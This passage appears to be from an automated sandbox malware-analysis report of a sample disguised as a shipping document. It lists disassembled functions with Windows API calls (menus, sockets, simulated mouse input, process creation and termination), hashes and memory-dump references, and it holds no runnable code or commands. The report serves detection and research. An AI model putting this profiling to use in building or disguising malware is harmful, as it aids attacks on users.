API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 3451389628-0
Opcode ID: caf938da04ec5feb0e4e7879e44bd196ddac860cb519de07b9b50f48ca8b2e4e
Instruction ID: 1e511bce4ed95014c7130c192a5c61ffd909f6216e363e56a6c910f4dfb7f1e6
Opcode Fuzzy Hash: caf938da04ec5feb0e4e7879e44bd196ddac860cb519de07b9b50f48ca8b2e4e
Instruction Fuzzy Hash: 23517931104340AFC710EF64C895EAABBEAFF88310F044A1DF555872A1DB71EA05CB56

Function 006E84DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 006E8540
GetMenuItemCount.USER32(00000000), ref: 006E8577
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 006E859F
GetMenuItemID.USER32(?,?), ref: 006E860E
GetSubMenu.USER32(?,?), ref: 006E861C
PostMessageW.USER32(?,00000111,?,00000000), ref: 006E866D

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 62788f5e00346cd985ddcb8bba16264f6b2f526db475713205f04b14ce2958ec
Instruction ID: c71172040dd2f519d8439914dfe45cc92ff70fd39b123839818497255c38e7de
Opcode Fuzzy Hash: 62788f5e00346cd985ddcb8bba16264f6b2f526db475713205f04b14ce2958ec
Instruction Fuzzy Hash: AF519A71A01215EFCF51EFA5C941AAEB7F6EF48310F108459E91ABB351CF30AE418B98

Function 006C4AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006C4B10
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006C4B5B
IsMenu.USER32(00000000), ref: 006C4B7B
CreatePopupMenu.USER32 ref: 006C4BAF
GetMenuItemCount.USER32(000000FF), ref: 006C4C0D
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 006C4C3E

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 8c3286b250916f139b55e3743d0338ae8211386585dd9df5dda1f6499d2fb186
Instruction ID: 3b37314aac8d764944f0b61627efe3773720ed783d08872851d26556c3ff3f26
Opcode Fuzzy Hash: 8c3286b250916f139b55e3743d0338ae8211386585dd9df5dda1f6499d2fb186
Instruction Fuzzy Hash: 12518770602209ABDF20CF68C898BFDBBA6EF44318F14815DE8159A2A1DB709945CB55

Function 006D8DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0071DC00), ref: 006D8E7C
WSAGetLastError.WSOCK32(00000000), ref: 006D8E89
__WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 006D8EAD
#16.WSOCK32(?,?,00000000,00000000), ref: 006D8EC5
_strlen.LIBCMT ref: 006D8EF7
WSAGetLastError.WSOCK32(00000000), ref: 006D8F6A

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ErrorLast$_strlenselect
String ID:
API String ID: 2217125717-0
Opcode ID: f06a10473d3e35585cb0ba61db142bf2ec47ec220191a6c99efd5d1323c083d6
Instruction ID: 18442f03bad94f7d44850ab6358ec9aaff11462949c8a0c5c2b665053f39078f
Opcode Fuzzy Hash: f06a10473d3e35585cb0ba61db142bf2ec47ec220191a6c99efd5d1323c083d6
Instruction Fuzzy Hash: 33419071900204AFCB54EBA4CD99EEEB7BBAF58314F10465EF51A97291DF30AE40CB64

Function 0069ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 0069B34E: GetWindowLongW.USER32(?,000000EB), ref: 0069B35F

BeginPaint.USER32(?,?,?), ref: 0069AC2A
GetWindowRect.USER32(?,?), ref: 0069AC8E
ScreenToClient.USER32(?,?), ref: 0069ACAB
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0069ACBC
EndPaint.USER32(?,?,?,?,?), ref: 0069AD06
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 006FE673

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
String ID:
API String ID: 2592858361-0
Opcode ID: b5275ae87f94f9b4230ab1f1016d4ea691e75793d467e2b4bb8933a868f0648f
Instruction ID: a02102c303baee98760c61e117d15270e712f3398128ff5c516f552eb018a71d
Opcode Fuzzy Hash: b5275ae87f94f9b4230ab1f1016d4ea691e75793d467e2b4bb8933a868f0648f
Instruction Fuzzy Hash: D241A070104304DFCB10DF64DC84FB67BE9AB59360F144669FAA48B2A1CB369C85DBA6

Function 006EE397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00741628,00000000,00741628,00000000,00000000,00741628,?,006FDC5D,00000000,?,00000000,00000000,00000000,?,006FDAD1,00000004), ref: 006EE40B
EnableWindow.USER32(00000000,00000000), ref: 006EE42F
ShowWindow.USER32(00741628,00000000), ref: 006EE48F
ShowWindow.USER32(00000000,00000004), ref: 006EE4A1
EnableWindow.USER32(00000000,00000001), ref: 006EE4C5
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 006EE4E8

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: d945d895903d6524bd19eed9eb221714e6c8e4d6c242640840b562538c25b725
Instruction ID: 2b3bf583ba8a688d7ed14b173b7a944069cef3e7e8aa761cd83f1ebbfcb16c5b
Opcode Fuzzy Hash: d945d895903d6524bd19eed9eb221714e6c8e4d6c242640840b562538c25b725
Instruction Fuzzy Hash: AE416334602680EFDB21CF65C499BD47BE2BF05304F1881A9EA588F2E2C776EC45CB51

Function 006C98BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 006C98D1

Part of subcall function 0069F4EA: std::exception::exception.LIBCMT ref: 0069F51E
Part of subcall function 0069F4EA: __CxxThrowException@8.LIBCMT ref: 0069F533

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 006C9908
EnterCriticalSection.KERNEL32(?), ref: 006C9924
LeaveCriticalSection.KERNEL32(?), ref: 006C999E
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 006C99B3
InterlockedExchange.KERNEL32(?,000001F6), ref: 006C99D2

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 2537439066-0
Opcode ID: 365b9c1e9dadf09f8e5863cd4b35f7ef07147611034bcf4e20335919aa4b6875
Instruction ID: bf62fa48ab8b79c0d9279d78389fdee1eba5c40d6c1d1badb35747b2d194ca7e
Opcode Fuzzy Hash: 365b9c1e9dadf09f8e5863cd4b35f7ef07147611034bcf4e20335919aa4b6875
Instruction Fuzzy Hash: CA319031900205EBDF10EFA4DC89EAAB7B9FF44710B1580A9E904EB246DB74DE10DBA4

Function 006D9B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,006D77F4,?,?,00000000,00000001), ref: 006D9B53

Part of subcall function 006D6544: GetWindowRect.USER32(?,?), ref: 006D6557

GetDesktopWindow.USER32 ref: 006D9B7D
GetWindowRect.USER32(00000000), ref: 006D9B84
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 006D9BB6

Part of subcall function 006C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 006C7AD0

GetCursorPos.USER32(?), ref: 006D9BE2
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 006D9C44

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: ff0c84cd08d4856feead808c772e6c5a8722f8f7195688b9ccff3e3168989e33
Instruction ID: 4a6b259c6bfdad99da09f25afa055a859269f2312c6f08c8d186878978bbd1ef
Opcode Fuzzy Hash: ff0c84cd08d4856feead808c772e6c5a8722f8f7195688b9ccff3e3168989e33
Instruction Fuzzy Hash: 5731C172504305ABC720DF58DC49F9BB7EAFF89314F000A1AF585E7281DA71E918CBA6

Function 006BAF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 006BAFAE
OpenProcessToken.ADVAPI32(00000000), ref: 006BAFB5
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 006BAFC4
CloseHandle.KERNEL32(00000004), ref: 006BAFCF
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006BAFFE
DestroyEnvironmentBlock.USERENV(00000000), ref: 006BB012

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: f46ad5d271e500599b583dcd686e62e33904bb32b27209c1fe32a2e4838e4187
Instruction ID: bde45cfa7294ade370f11ea0d7544fa8c64f6b466f9cd20217ae6a8d4bd4c0bf
Opcode Fuzzy Hash: f46ad5d271e500599b583dcd686e62e33904bb32b27209c1fe32a2e4838e4187
Instruction Fuzzy Hash: D0214CB2104209EBDB129FD4DD09BEE7BAAAB44304F048115FA01A2161C7BADDA1EB61

Function 006EEBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 0069AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0069AFE3
Part of subcall function 0069AF83: SelectObject.GDI32(?,00000000), ref: 0069AFF2
Part of subcall function 0069AF83: BeginPath.GDI32(?), ref: 0069B009
Part of subcall function 0069AF83: SelectObject.GDI32(?,00000000), ref: 0069B033

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 006EEC20
LineTo.GDI32(00000000,00000003,?), ref: 006EEC34
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 006EEC42
LineTo.GDI32(00000000,00000000,?), ref: 006EEC52
EndPath.GDI32(00000000), ref: 006EEC62
StrokePath.GDI32(00000000), ref: 006EEC72

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: cbe01f33a6cb2a99fd6779416e71355063043c488f3ec2a8787e05ecb0258c2d
Instruction ID: 152e76731e256f4a97e78351b3484284181b973e890be4f17f6ab1c18b08bf3b
Opcode Fuzzy Hash: cbe01f33a6cb2a99fd6779416e71355063043c488f3ec2a8787e05ecb0258c2d
Instruction Fuzzy Hash: C211097600024DBFEF129F90DC88EEA7F6DEB08354F04C112BE1989160DB769D55DBA4

Function 006BE19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 006BE1C0
GetDeviceCaps.GDI32(00000000,00000058), ref: 006BE1D1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 006BE1D8
ReleaseDC.USER32(00000000,00000000), ref: 006BE1E0
MulDiv.KERNEL32(000009EC,?,00000000), ref: 006BE1F7
MulDiv.KERNEL32(000009EC,?,?), ref: 006BE209

Part of subcall function 006B9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,006B9A05,00000000,00000000,?,006B9DDB), ref: 006BA53A

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: 7e235d8c1cc8c9fa8dec9237d5b7a9e1150c538df08038e37988f996a5e1864d
Instruction ID: 32e646011b385840f20a9eb721f80dc84bcb40b5056c4e2d6c5fc283fc4ed942
Opcode Fuzzy Hash: 7e235d8c1cc8c9fa8dec9237d5b7a9e1150c538df08038e37988f996a5e1864d
Instruction Fuzzy Hash: D20184B5A40314BFEB109BE58C45B9EBFB9EB48351F008166EA04A7390DA719C00CBA4

Function 006A7B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 006A7B47

Part of subcall function 006A123A: __initp_misc_winsig.LIBCMT ref: 006A125E
Part of subcall function 006A123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 006A7F51
Part of subcall function 006A123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 006A7F65
Part of subcall function 006A123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 006A7F78
Part of subcall function 006A123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 006A7F8B
Part of subcall function 006A123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 006A7F9E
Part of subcall function 006A123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 006A7FB1
Part of subcall function 006A123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 006A7FC4
Part of subcall function 006A123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 006A7FD7
Part of subcall function 006A123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 006A7FEA
Part of subcall function 006A123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 006A7FFD
Part of subcall function 006A123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 006A8010
Part of subcall function 006A123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 006A8023
Part of subcall function 006A123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 006A8036
Part of subcall function 006A123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 006A8049
Part of subcall function 006A123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 006A805C
Part of subcall function 006A123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 006A806F

__mtinitlocks.LIBCMT ref: 006A7B4C

Part of subcall function 006A7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0073AC68,00000FA0,?,?,006A7B51,006A5E77,00736C70,00000014), ref: 006A7E41

__mtterm.LIBCMT ref: 006A7B55

Part of subcall function 006A7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,006A7B5A,006A5E77,00736C70,00000014), ref: 006A7D3F
Part of subcall function 006A7BBD: _free.LIBCMT ref: 006A7D46
Part of subcall function 006A7BBD: DeleteCriticalSection.KERNEL32(0073AC68,?,?,006A7B5A,006A5E77,00736C70,00000014), ref: 006A7D68

__calloc_crt.LIBCMT ref: 006A7B7A
GetCurrentThreadId.KERNEL32 ref: 006A7BA3

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
String ID:
API String ID: 2942034483-0
Opcode ID: 613b52c751eae31f0b21a7aee4a01c222eb356aff426e92e5593b45eb8a60b25
Instruction ID: 129220d77a54a315278eff4ce5b02581d92f7f2ea746a81c19e2934d96c1adba
Opcode Fuzzy Hash: 613b52c751eae31f0b21a7aee4a01c222eb356aff426e92e5593b45eb8a60b25
Instruction Fuzzy Hash: 89F0967210D31219E6A57B74BC4768B26979F03731F2546ADF8A0C91D2FF259C414DB8

Function 006827EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 0068281D
MapVirtualKeyW.USER32(00000010,00000000), ref: 00682825
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00682830
MapVirtualKeyW.USER32(000000A1,00000000), ref: 0068283B
MapVirtualKeyW.USER32(00000011,00000000), ref: 00682843
MapVirtualKeyW.USER32(00000012,00000000), ref: 0068284B

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: bc05227e67b6bda6ecaf79d251e991d85e111f220542ffaafec5327e56b9e6c6
Instruction ID: 367f6ceef7f69920abf04dc989ac412e6d4b036033a7d828b6f18fbc154078d5
Opcode Fuzzy Hash: bc05227e67b6bda6ecaf79d251e991d85e111f220542ffaafec5327e56b9e6c6
Instruction Fuzzy Hash: 47016CB0901B59BDE3008F6A8C85B52FFA8FF15354F00411B915C47941C7F5A864CBE5

Function 006C9AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: 81342b311d6047333496bd628d2a65b9d0ad1a4b949d6ef9b2ff285fd526a4eb
Instruction ID: ef05980340fa1fb44a19031dac314569d8c71f00fb12ff30e16b2f96504c4431
Opcode Fuzzy Hash: 81342b311d6047333496bd628d2a65b9d0ad1a4b949d6ef9b2ff285fd526a4eb
Instruction Fuzzy Hash: 69014B32102711EBD7251BD5EC4CEFB776AFF88701B04462DF507921A49FB8AC00DA64

Function 006C7BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 006C7C07
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 006C7C1D
GetWindowThreadProcessId.USER32(?,?), ref: 006C7C2C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006C7C3B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006C7C45
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006C7C4C

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: ab0a87e03905ef8ad253d5230582ecea588223b1da508027e0b6e1755a8790f4
Instruction ID: 6dd90f44d584cc87d392beb7a79f7ac871faa0574abc0d7b082574b216e9e832
Opcode Fuzzy Hash: ab0a87e03905ef8ad253d5230582ecea588223b1da508027e0b6e1755a8790f4
Instruction Fuzzy Hash: 3CF01772241258FBE6315B929C0EEEF7B7CEBC6B51F004218FA0192051DBA95E41D6B9

Function 006C9A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 006C9A33
EnterCriticalSection.KERNEL32(?,?,?,?,006F5DEE,?,?,?,?,?,0068ED63), ref: 006C9A44
TerminateThread.KERNEL32(?,000001F6,?,?,?,006F5DEE,?,?,?,?,?,0068ED63), ref: 006C9A51
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,006F5DEE,?,?,?,?,?,0068ED63), ref: 006C9A5E

Part of subcall function 006C93D1: CloseHandle.KERNEL32(?,?,006C9A6B,?,?,?,006F5DEE,?,?,?,?,?,0068ED63), ref: 006C93DB

